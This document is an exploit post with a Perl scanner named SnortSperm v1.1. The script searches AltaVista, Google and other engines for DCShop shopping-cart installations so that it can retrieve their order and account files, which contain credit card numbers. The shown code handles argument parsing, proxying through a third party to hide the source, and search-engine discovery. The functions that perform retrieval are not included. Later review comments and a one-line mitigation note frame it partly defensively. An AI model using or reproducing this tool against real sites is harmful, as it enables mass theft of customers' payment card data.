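The following program searches the Internet (using popular search engines) for vulnerable installations of DCShop. When it finds one, it tries to retrieve the order and account files, which contain both order details and credit card numbers. Because the files are fetched with ordinary web requests, an installation is exposed whenever it serves them from a web-accessible directory; operators should deny direct requests to those files or move them outside the served tree.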
Exploit Code:
--- ss.pl ---
#!/usr/bin/perl
#
# SnortSperm v1.1, a DCShop (Web shopping cart system) order and account scanner
# by darkman, with help of antistar and bsl4
# A proof of concept
#
# Users running windows have to download and install ActivePerl from
# www.activeperl.com, and run the script from the MS-DOS Prompt by typing:
#
# \perl\bin\perl <path of ss.pl>\ss.pl
#
# I'd like to thank Peter Helms for publishing the information regarding this
# exploit.
#
# E-mail: darkman@coderz.net
# Homepage: www.coderz.net/darkman
use LWP::Simple;
use LWP::UserAgent;
# Create the LWP::UserAgent object; the proxy option further down is applied
# to it.
# NOTE(review): unless a User-Agent string is set outside this part of the
# file, requests sent through this object carry LWP's default libwww-perl
# identifier, which is worth searching for in web-server access logs.
my $ua=new LWP::UserAgent;
# flush stdout (so we get 'in progress' messages)
$|=1;
# Check arguments.
# Every command-line word is inspected once. The script runs without
# `use strict`, so all of these variables are package globals.
# The quoted strings on the right of =~ are used as regex patterns and are
# not anchored, so they match anywhere inside the argument.
foreach $opt (@ARGV) {
$proxyserver = $1 if ($opt =~ "proxy=(.*)");
$proxyport = $1 if ($opt =~ "port=(.*)");
# Flags selecting which search engine is used to discover candidate sites.
$altavista = 1 if ($opt eq "altavista");
$google = 1 if ($opt eq "google");
$lycos = 1 if ($opt eq "lycos");
$nbci = 1 if ($opt eq "nbci");
$netscape = 1 if ($opt eq "netscape");
$yahoo = 1 if ($opt eq "yahoo");
# File names are collected as hash keys, so a name repeated on the command
# line is only stored once.
$flatfiles{$1} = $1 if ($opt =~ "flatfile=(.*)");
$pathfiles{$1} = $1 if ($opt =~ "pathfile=(.*)");
}
# Banner, always written to STDERR.
print STDERR "SnortSperm v1.1, a DCShop (Web shopping cart system) order and account scanner\n";
# Show options if no valid arguments were found: no search engine flag was
# set and no flatfile= argument was given. A pathfile= or proxy= argument
# alone is not enough to start a run.
if (!($altavista or $google or $lycos or $nbci or $netscape or $yahoo) && (scalar keys %flatfiles==0)) {
print STDERR "usage: ./ss.pl <options>\n\nproxy=<proxyserver> for scanning using a proxy server\nport=<proxyport> for specifying proxy port (default proxy port is 8080)\naltavista for scanning using AltaVista\ngoogle for scanning using Google\nlycos for scanning using Lycos\nnbci for scanning using NBCi (use additional paths with this option)\nnetscape for scanning using Netscape Search\nyahoo for scanning using Yahoo!\nflatfile=<filename> for scanning using a flat file\npathfile=<filename> for additional paths\n\noptions can be combined";
exit;
}
# Load additional paths.
# Each pathfile is read line by line; one trailing '/' is removed and every
# non-empty line is stored as a key of %additional_paths (duplicates
# collapse). How %additional_paths is used is not visible in this part of
# the file.
# NOTE(review): two-argument open on a name taken from the command line, a
# bareword handle, and no check of open's result; an unreadable file is
# skipped silently and the handle is never closed here.
foreach $pathfile (keys %pathfiles) {
if ($pathfile ne '') {
open(FH, $pathfile);
while (<FH>) {
chomp;
# Strip one trailing slash so stored paths have a uniform form.
$_ = $1 if (/(.*)\/$/);
$additional_paths{$_}=$_ if ($_ ne '');
}
}
}
# Scan through a proxy (insert proxyserver and port).
# The port falls back to 8080 when none was given. The proxy is configured
# for the 'http' scheme only, on the $ua object.
# NOTE(review): for anyone reading server logs, the source address of
# requests sent this way is the proxy, not the machine running the script.
if ($proxyserver) {
$proxyport = 8080 if (!$proxyport);
print STDERR "using $proxyserver:$proxyport as proxy\n";
$ua->proxy('http',"$proxyserver:$proxyport");
}
# Scanning using selected search engines.
# Every branch follows the same pattern: set three package globals and call
# scan_search_engine() with the first results URL for the query "DCShop".
#   $search_engine_url - scheme and host of the engine
#   $link              - regex string whose capture is a result URL
#   $next              - regex string whose capture is the next-page link
# scan_search_engine() is defined outside this part of the file; presumably
# it reads these globals - confirm there. The patterns are tied to each
# engine's result-page HTML.
# NOTE(review): candidate sites are found only through what public search
# engines have indexed for the product name. Keeping shop pages out of an
# index does not remove the underlying exposure; the order and account
# files must not be retrievable over the web.
if ($altavista) {
print STDERR "\nScanning using AltaVista";
$search_engine_url = "http://www.altavista.com";
$link = "status='([^']*)";
$next = "a href=\"([^\"]+).*\\[Next";
scan_search_engine("$search_engine_url/sites/search/web?q=DCShop&pg=q&kl=XX");
}
if ($google) {
print STDERR "\nScanning using Google";
$search_engine_url = "http://www.google.com";
$link = "<p><A HREF=([^>]*)";
$next = "A HREF=([^>]+).*<b>Next<\\/b>";
scan_search_engine("$search_engine_url/search?q=DCShop");
}
if ($lycos) {
print STDERR "\nScanning using Lycos";
$search_engine_url = "http://www.lycos.co.uk";
$link = "<b><a href=\"([^\"]*)";
$next = "A HREF=([^>]+).*<B>Forward<\\/B>";
scan_search_engine("$search_engine_url/cgi-bin/pursuit?matchmode=and&mtemp=main&etemp=error&query=DCShop&cat=lycos");
}
# The NBCi option sends its query to www.goto.com.
if ($nbci) {
print STDERR "\nScanning using NBCi";
$search_engine_url = "http://www.goto.com";
$link = "<em>([^<]*)";
$next = "a href=\"([^\"]+).*<b>More";
scan_search_engine("$search_engine_url/d/search/p/nbci/?Keywords=DCShop");
}
if ($netscape) {
print STDERR "\nScanning using Netscape Search";
$search_engine_url = "http://search.netscape.com";
$link = "size=\"1\">([^<]*)";
$next = "a href=\"([^\"]+).*next>>";
scan_search_engine("$search_engine_url/search.psp?cp=nsikwphopNetscape&charset=UTF-8&search=DCShop");
}
# The Yahoo! option sends its query to google.yahoo.com.
if ($yahoo) {
print STDERR "\nScanning using Yahoo!";
$search_engine_url = "http://google.yahoo.com";
$link = "#006600>([^&]*)";
$next = "a href=\"([^\"]+).*Next 20 ";
scan_search_engine("$search_engine_url/bin/query?p=DCShop&hc=0&hs=0");
}
# Scanning using flat file(s).
# Each line of a flat file has its newline and one trailing '/' removed and
# is then left in $_ for path_traversal(), which is called without
# arguments. path_traversal() is defined outside this part of the file, so
# what it does with the line cannot be stated from here.
# NOTE(review): same unchecked two-argument open on a command-line name and
# reuse of the bareword handle FH as in the pathfile loader; empty lines
# are not filtered before the call.
foreach $flatfile (keys %flatfiles) {
if ($flatfile ne '') {
print STDERR "\nScanning using flat file: $flatfile";
open(FH, $flatfile);
while (<FH>) {
chomp;
$_ = $1 if (/(.*)\/$/);
path_traversal();
}
}
}
# Show number of sites found.
# %unique_urls and %unique_sites are filled by code outside this part of
# the file. The reported URL count is four times the number of distinct
# keys; the reason for the factor 4 is not visible here - presumably the
# number of requests planned per URL, confirm against the rest of the file.
$total_urls = 4*scalar keys %unique_urls;
$total_sites = scalar keys %unique_sites;
print STDERR "\nFound $total_urls URLs at $total_sites sites to scan\n";